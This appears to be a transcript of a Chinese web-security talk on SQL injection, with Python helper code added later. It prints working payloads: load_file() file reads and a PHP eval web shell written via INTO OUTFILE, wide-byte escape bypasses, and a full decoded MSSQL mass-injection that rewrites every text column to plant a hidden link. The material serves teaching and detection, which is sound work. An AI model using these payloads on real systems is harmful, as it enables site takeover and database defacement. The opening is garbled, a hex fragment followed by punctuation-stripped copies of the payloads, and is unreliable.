46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL injection techniques - writing a file (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Connect to MySQL remotely
mysql> use xssdb;
mysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;
mysql> prepare cmd from @a;
mysql> execute cmd;
@a decodes to
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written is
<?php @eval($_POST['cmd']);?>
The quotes around the output path live only inside the hex literal, so nothing in the statement text is subject to escaping; the inner 0x... literal is the shell source itself.
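Both slides above (load_file() with a char()/0x path, and SET @a=0x... followed by PREPARE/EXECUTE) rely on MySQL accepting a string in a quote-free literal form. The following added example, not code from the talk, builds and decodes those forms; the SLIDE_* constants are the literals as printed on the slides, and the function names are assumptions:

```python
import re

# Added example, not code from the talk. Helpers for the two quote-free literal
# forms MySQL accepts, char(N,...) and 0x..., plus the SET/PREPARE/EXECUTE wrapper
# the slide uses when the statement itself must not contain a quote. The SLIDE_*
# constants are copied from the slides (hex wrapped as printed there).


def to_char_list(s: str) -> str:
    """MySQL char(N,...) form. It contains no quote, so addslashes() leaves it alone."""
    return "char(" + ",".join(str(b) for b in s.encode("latin-1")) + ")"


def to_hex_literal(s: str) -> str:
    """MySQL 0x... form. In a string context MySQL uses the raw bytes."""
    return "0x" + s.encode("latin-1").hex().upper()


def decode_char_list(expr: str) -> str:
    m = re.fullmatch(r"\s*char\((.*)\)\s*", expr, re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("not a char() list")
    return bytes(int(n) for n in m.group(1).split(",")).decode("latin-1")


def decode_hex_literal(expr: str) -> str:
    expr = expr.strip()
    if not expr.lower().startswith("0x"):
        raise ValueError("not a 0x literal")
    return bytes.fromhex(expr[2:]).decode("latin-1")


def prepare_from_hex(statement: str, var: str = "@a") -> list:
    """The phpMyAdmin / remote-MySQL route from the slide: the whole statement is
    passed as a hex literal, so the quotes around the outfile path never appear in
    the SQL text that an escaping layer would see."""
    return [f"SET {var}={to_hex_literal(statement)};",
            f"PREPARE cmd FROM {var};",
            "EXECUTE cmd;"]


SLIDE_CHAR_PATH = ("char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,"
                   "107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,"
                   "112,104,112)")
SLIDE_HEX_PATH = "0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870"
SLIDE_PREPARED = ("0x73656C656374203078334333463730363837303230343036353736363136433238323"
                  "435463530344635333534354232373633364436343237354432393342334633452066726F6D"
                  "20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70"
                  "687027")
SLIDE_SHELL = "0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E"


if __name__ == "__main__":
    print(decode_char_list(SLIDE_CHAR_PATH))
    print(decode_hex_literal(SLIDE_HEX_PATH))
    print(decode_hex_literal(SLIDE_PREPARED))
    print(decode_hex_literal(SLIDE_SHELL))
    for stmt in prepare_from_hex("select 'x' into outfile 'C:/shell.php'"):
        print(stmt)
```

The same decoders are what a defender wants when reading a web log: a char() list or a long 0x literal in a query string is almost never legitimate input, and decoding it shows immediately which file was read or written.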
SQL injection techniques - wide-byte escape bypass (1/3)
• The injected lead byte and the backslash (0x5C) inserted by escaping are reassembled into one two-byte character, which swallows the escape and leaves the quote free
• Scenario
  – Escaping done with a byte-oriented function that does not know the connection character set
    • addslashes
    • mysql_escape_string
    • php.ini: magic_quotes_gpc = On
  – Connection uses BIG5 or GBK
    • set names gbk / set names big5
SQL injection techniques - wide-byte escape bypass (2/3)
• Chinese text is encoded as two bytes per character
  – Big5
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E or 0xA1-0xFE
  – GBK
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E (and 0x80-0xFE)
  – GB2312
    • lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – The backslash 0x5C lies inside the trail-byte range of Big5 and GBK (but not of GB2312), so a lead byte followed by the escaping backslash is a valid character; usable lead bytes include 0xBF, 0xCC, 0xD5, …
SQL injection techniques - wide-byte escape bypass (3/3)
• Bypassing escaping in a quoted parameter: place the lead byte immediately before the quote
  – http://www.hackdemo.com/searchUserLash.php?name=%B5%27+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=%CC%27+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=%D5%27+AND+1=2+UNION+SELECT+1,2,3,4%23
  After escaping the server holds B5 5C 27; decoded as Big5/GBK, B5 5C is one character and 27 closes the string literal, so the UNION runs and %23 (#) comments out the rest of the query
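The byte-level mechanics of the three slides above, as an added example that is not part of the talk. It assumes PHP addslashes() semantics re-implemented on bytes, Python's gbk/big5/utf-8 codecs as a stand-in for MySQL's character-set decoding, and a constructed query template and payload; the function names are assumptions. The find_lead_bytes() helper goes beyond the slide's three bytes and enumerates every lead byte that works for a given charset:

```python
# Added example, not code from the talk. A byte-level model of what the escaping
# layer and the database's character-set decoding do to the lead-byte payloads on
# the three slides above. The query template, the payload text and the lead bytes
# tried are constructed here; Python's gbk/big5 codecs stand in for MySQL's.


def addslashes(data: bytes) -> bytes:
    """PHP addslashes() / magic_quotes_gpc: a backslash before ' \" \\ and NUL.
    It works on bytes and knows nothing about the connection character set."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def decoded_parameter(name_param: bytes, charset: str) -> str:
    """The escaped bytes as MySQL sees them once decoded under SET NAMES <charset>."""
    return addslashes(name_param).decode(charset, errors="replace")


def build_query(name_param: bytes, charset: str) -> str:
    return "SELECT * FROM user WHERE name='" + decoded_parameter(name_param, charset) + "'"


def has_unescaped_quote(text: str) -> bool:
    """A single quote not immediately preceded by a backslash ends the literal."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def quote_breaks_out(lead_byte: int, charset: str) -> bool:
    """Does <lead_byte> followed by a quote survive escaping under <charset>?"""
    payload = bytes([lead_byte]) + b"' AND 1=2 UNION SELECT 1,2,3,4#"
    return has_unescaped_quote(decoded_parameter(payload, charset))


def find_lead_bytes(charset: str) -> list:
    """Every lead byte for which <lead> 5C decodes to exactly one character under
    <charset>, i.e. every byte able to swallow the escaping backslash. UTF-8 has
    none: 0x5C is never a continuation byte, which is why the slide says use UTF-8."""
    usable = []
    for lead in range(0x81, 0xFF):
        try:
            if len(bytes([lead, 0x5C]).decode(charset)) == 1:
                usable.append(lead)
        except UnicodeDecodeError:
            continue
    return usable


if __name__ == "__main__":
    for cs in ("gbk", "big5", "utf-8"):
        print(cs, quote_breaks_out(0xBF, cs), build_query(b"\xbf' OR 1=1#", cs))
    print(len(find_lead_bytes("gbk")), "usable lead bytes under gbk")
```

The fix on the defence slide (use UTF-8) follows directly from find_lead_bytes(): with a UTF-8 connection no lead byte can absorb the backslash. Where a legacy charset must stay, the escaping function has to know that charset, which addslashes() and mysql_escape_string() never do.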
SQL Column Truncation - introduction (1/3)
• MySQL sql_mode
  – STRICT_ALL_TABLES not enabled (it is not part of the default sql_mode in MySQL 5.6 and earlier)
    • inserting a value longer than the column only produces a warning
    • the value is silently truncated and the row is still written
  – STRICT_ALL_TABLES enabled
    • inserting a value longer than the column produces an error
    • ERROR 1406 (Data too long for column); the row is not written
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - effect (2/3)
• Register the username "admin" followed by enough spaces to exceed the column width and then one more character: the duplicate check compares the submitted string, which is not equal to "admin", so it passes; the INSERT truncates the value to "admin" plus trailing spaces; and because comparisons on non-binary string columns ignore trailing spaces, WHERE username='admin' now matches two rows
SQL Column Truncation - defences (3/3)
• Actively strip whitespace from strings that must not contain it
  – e.g. account names
• Add BINARY to the comparison when SELECTing, so trailing spaces count
• Configure MySQL to compare as BINARY by default (a binary collation on the column)
• Enable STRICT_ALL_TABLES in MySQL
  – over-length data raises an ERROR instead of a WARNING
  – inserts and updates then fail on long input, so the application may need extra length checks before writing
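The truncation slides as a runnable model, added here and not part of the talk. It assumes an in-memory stand-in for the MySQL behaviours involved (silent truncation under a non-strict sql_mode, PAD SPACE comparison on non-binary string columns, ERROR 1406 under STRICT_ALL_TABLES), a constructed column width and account names, and hypothetical function names; it runs the registration attack and each of the three defences from the slide against it:

```python
# Added example, not code from the talk. An in-memory model of the two MySQL
# behaviours that make column truncation exploitable: silent truncation when the
# sql_mode is not strict, and PAD SPACE comparison (trailing spaces ignored) on
# non-binary string columns. Column width and account names are constructed.


class DataTooLong(Exception):
    """Stands in for MySQL ERROR 1406 (Data too long for column)."""


def store_varchar(value: str, width: int, strict: bool) -> str:
    """INSERT into VARCHAR(width). Non-strict: warn and truncate; strict: ERROR 1406."""
    if len(value) > width:
        if strict:
            raise DataTooLong(f"Data too long for column: {len(value)} > {width}")
        return value[:width]             # warning only, the row is still written
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """'=' on a non-binary collation: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")


def binary_equal(a: str, b: str) -> bool:
    """'=' with BINARY or a _bin collation: every character counts."""
    return a == b


class UserTable:
    def __init__(self, width: int, strict: bool, compare=pad_space_equal):
        self.width, self.strict, self.compare = width, strict, compare
        self.rows = []

    def register(self, username: str) -> None:
        # The application's duplicate check runs on the submitted value, and
        # 'admin<spaces>x' is not equal to 'admin' under either comparison.
        if any(self.compare(r, username) for r in self.rows):
            raise ValueError("username already taken")
        self.rows.append(store_varchar(username, self.width, self.strict))

    def find(self, username: str) -> list:
        return [r for r in self.rows if self.compare(r, username)]


def registration_attack(width: int = 16, strict: bool = False, compare=pad_space_equal) -> int:
    """Register 'admin', then the attacker's over-long name; return how many rows
    a later lookup of 'admin' resolves to (1 is correct, 2 is the vulnerability)."""
    table = UserTable(width, strict, compare)
    table.register("admin")
    table.register("admin" + " " * (width - len("admin")) + "x")   # width + 1 chars
    return len(table.find("admin"))


def strict_mode_blocks(width: int = 16) -> bool:
    """STRICT_ALL_TABLES turns the truncation into ERROR 1406."""
    try:
        registration_attack(width, strict=True)
    except DataTooLong:
        return True
    return False


def reject_whitespace(username: str) -> bool:
    """Application-side defence from the slide: names must not contain whitespace."""
    return username == "".join(username.split())


if __name__ == "__main__":
    print("rows matching 'admin' after attack:", registration_attack())        # 2
    print("with BINARY comparison:", registration_attack(compare=binary_equal))  # 1
    print("strict mode raises ERROR 1406:", strict_mode_blocks())               # True
```

One more check worth knowing: a UNIQUE index on the column also stops the attack, because the index comparison ignores trailing spaces in the same way and rejects the truncated "admin" + spaces as a duplicate of "admin".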
SQL Injection - further thoughts
• Can INSERT and UPDATE be attacked as well? (Yes: any concatenated value is injectable, not only the WHERE clause of a SELECT)
• Does NoSQL mean no SQL injection? (No SQL, but query or operator injection into the database's own query language still exists)
• Other exploitation techniques
  – Deep Blind Injection
  – Error-Based Injection
    • duplicate-key errors
    • function errors
  – information_schema
  – User-Defined Functions (UDF)
  – Triggers
SQL Injection - automated tools
• Havij
• Pangolin
• w3af
• Jsky
• sqlmap
• …
Defending against SQL injection properly
• Principle of least privilege for the database account (no FILE privilege unless the application needs it)
• Use prepared statements (parameterised queries)
• Use stored procedures (still parameterised; dynamic SQL built inside a procedure is just as injectable)
• Use UTF-8; avoid BIG5 or GBK connections
• Check data types and cast
  – bool settype(mixed &$var, string $type)
  – intval(), doubleval()
• Use a safe encoding library
  – OWASP ESAPI
    • MySQLCodec
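The prepared-statement and type-cast items above, side by side with the vulnerable concatenation they replace, as an added example that is not part of the talk. It assumes sqlite3 in place of MySQL, a constructed user table, and hypothetical function names:

```python
import sqlite3

# Added example, not code from the talk. The same lookup written three ways:
# string concatenation (injectable), a parameterised query, and an integer cast
# applied before concatenation (the intval() idea). sqlite3 stands in for MySQL;
# the rows are constructed sample data.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)",
                     [(1, "alice", "Pa55w0rd"), (2, "bob", "hunter2")])
    return conn


def get_user_concat(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable: the parameter becomes part of the SQL text."""
    return conn.execute("SELECT name FROM user WHERE id=" + id_param).fetchall()


def get_user_prepared(conn: sqlite3.Connection, id_param: str) -> list:
    """Parameterised: the SQL is parsed first and the value is bound afterwards,
    so whatever the value contains is compared, never executed."""
    return conn.execute("SELECT name FROM user WHERE id=?", (id_param,)).fetchall()


def get_user_intval(conn: sqlite3.Connection, id_param: str) -> list:
    """Type enforcement: parse as an integer before building the query, so the
    text that reaches the SQL can only ever be digits. Non-numeric input is
    rejected outright rather than coerced."""
    try:
        id_int = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT name FROM user WHERE id=" + str(id_int)).fetchall()


INJECTION = "1 OR 1=1"   # constructed payload: returns every row through the vulnerable path

if __name__ == "__main__":
    db = make_db()
    print("concat:  ", get_user_concat(db, INJECTION))    # both users
    print("prepared:", get_user_prepared(db, INJECTION))  # []
    print("intval:  ", get_user_intval(db, INJECTION))    # []
```

Least privilege belongs with these: load_file() and INTO OUTFILE from the earlier slides require the FILE privilege, and an application account without it (and a server with secure_file_priv set) cannot read or write server files even through a working injection.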
MSSQL real-world case - automated injection from 116jurist.ru (1/4)
• 2012-12-xx 10:03:31, captured query string (hex literal wrapped across lines; the @ signs lost in the transcript are restored)
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - automated injection from 116jurist.ru (2/4)
• 2012-12-xx 10:03:33, captured query string (hex literal wrapped across lines)
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - automated injection from 116jurist.ru (3/4)
• 2012-12-xx 10:03:44, captured query string (hex literal wrapped across lines)
• Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - automated injection from 116jurist.ru, decoded (4/4)
The three hex literals decode to the T-SQL below (the @ signs, quotes, dots and commas lost in the transcript are restored from the hex; the link text is Windows-1251 Russian). All three open the same cursor over every varchar/nvarchar/text/ntext column of every base table and differ only in the length threshold and the EXEC body, so together they are one sequence: strip any earlier injection, widen the columns, then inject. SET ANSI_WARNINGS OFF at the start makes SQL Server truncate silently instead of failing when the appended markup no longer fits.
• 10:03:31, columns wider than 10: cut every value back to the text before a previous injection
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• 10:03:33, columns wider than 20: widen every such column to varchar(8000) NOT NULL so the payload fits
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• 10:03:44, columns wider than 80: append the hidden link block to every value
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
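Detection logic for the request shape on the four slides above, as an added example that is not part of the talk: it finds the cast(0x... as varchar) literal in each request, decodes it, and names the stage of the sequence. The log lines are constructed here (their hex is generated from the decoded statements on this slide), the /item.asp path and the function names are assumptions, and the stage labels are this example's own:

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the talk. A detector for the request shape on the
# slides above: a T-SQL payload hidden in a cast(0x... as varchar) literal and
# handed to exec(). The log lines are constructed here; their hex is generated
# from the decoded statements on slide 4/4, and the /item.asp path is assumed.

CAST_HEX = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.IGNORECASE)


def decode_cast_hex(hex_digits: str) -> str:
    # The link text in the captured payload is Windows-1251 Russian.
    return bytes.fromhex(hex_digits).decode("cp1251", errors="replace")


def classify(sql: str) -> str:
    """Name the stage of the mass-injection sequence the decoded statement performs."""
    s = sql.lower()
    if "information_schema.columns" not in s:
        return "other-hex-exec"
    if "alter column" in s:
        return "widen-columns"            # stage 2: every text column -> varchar(8000)
    if "update [" in s and any(tag in s for tag in ("<a href", "<script", "<style", "<iframe")):
        return "inject-markup"            # stage 3: append the hidden link to every row
    if "substring(" in s and "charindex(" in s:
        return "strip-previous-inject"    # stage 1: cut off an earlier injection
    return "cursor-over-columns"


def scan_log(lines) -> list:
    """(line number, stage, decoded SQL) for every request carrying a hex payload."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in CAST_HEX.finditer(unquote_plus(line)):
            sql = decode_cast_hex(m.group(1))
            findings.append((n, classify(sql), sql))
    return findings


def as_request(sql: str) -> str:
    """Wrap a statement the way the injector did: hex literal inside cast()/exec()."""
    hexed = sql.encode("cp1251").hex()
    return ("GET /item.asp?Serno=51+declare+@s+varchar(8000)+set+@s=cast(0x" + hexed +
            "+as+varchar(8000))+exec(@s)-- HTTP/1.1")


# Decoded statements from slide 4/4: one cursor template, three EXEC bodies.
CURSOR = ("set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
          "select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t "
          "where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>{n} "
          "and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor "
          "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('{body}') "
          "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor")
STAGES = [
    (10, "UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) "
         "where ['+@C+'] like ''%</title><%'' "),
    (20, "ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL"),
    (80, "UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;"
         "clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >"
         "юридические-услуги-москва</a></div>'' "),
]

# Constructed sample log: one benign request, then the three stages in order.
SAMPLE_LOG = ["GET /item.asp?Serno=51 HTTP/1.1"] + [
    as_request(CURSOR.format(n=n, body=body)) for n, body in STAGES]


if __name__ == "__main__":
    for line_no, stage, sql in scan_log(SAMPLE_LOG):
        print(line_no, stage, sql[:60] + "...")
```

In practice the hex literal alone is the strongest signal: a numeric Serno parameter followed by declare/cast/exec should never appear in legitimate traffic, so the first stage can be blocked before the column-widening ALTER runs. Recovery after the fact is the first-stage statement itself, which is exactly why the injector ships it: cutting each value at the first "</title><" removes its own earlier payload.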
References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (Traditional Chinese edition of 白帽子讲Web安全, "White Hat Talks Web Security"), 2012
• MySQL 5.1 Reference Manual, String Functions
• MySQL 5.1 Reference Manual, Miscellaneous Functions
